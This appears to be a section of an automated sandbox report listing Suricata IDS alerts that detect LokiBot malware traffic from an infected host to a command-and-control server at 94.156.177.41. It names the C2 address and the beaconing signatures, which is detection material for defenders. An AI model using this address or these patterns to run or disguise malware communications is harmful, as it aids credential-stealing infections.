            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49830 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49922 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49922 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49922 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49851 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49851 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49922
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49883 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49800
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49781
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49932 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49981 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49769
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49932 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49932 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49883 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49981 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49981 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49932 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49853 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49830
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49826 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49768
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49853 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49853 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49970 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50000 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49970 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49807 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49970 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49853 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49807 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49826 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49807 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49883
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49965 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49826 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49932 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49894 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49807 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49814 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49807 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49990 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49970 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49984 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49926 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49853 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49851 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49965 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49894 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49894 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49965 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50000 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49814 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49814 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49990 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49990 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49965 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49826
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49970 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49984 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49926 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49807
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49851 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49853
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49981 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50000 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49894 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49907 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49907 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49965 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49913
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49990 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49984 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49814 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49814 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50000 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50000 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49984 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49741
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49894 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49990 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49926 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49775
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49907 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49894
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49851
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49878 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49875
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49907 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49878 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49878 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49984 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49981 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49970
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49902 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49907 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49926 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49917 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49981
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49902 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49984
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49965
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49902 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49990
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49878 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49858 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49839 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49814
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49839 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49858 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49858 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49926 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49878 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49957 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49957 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49926
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49932
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49839 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49907
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49917
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49902 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49839 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49839 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49957 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49902 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49961 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49858 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49961 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49961 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49820 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49820 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49820 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49942 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49858 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49957 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49957 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49995 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49839
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49942 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49902
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49878
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49961 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49995 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49945 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49945 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49945 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49942 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49961 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49995 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49957
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49820 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49820 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49820
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49858
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49951 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49951 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49951 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49942 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49945 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49942 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49889 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49951 -> 94.156.177.41:80
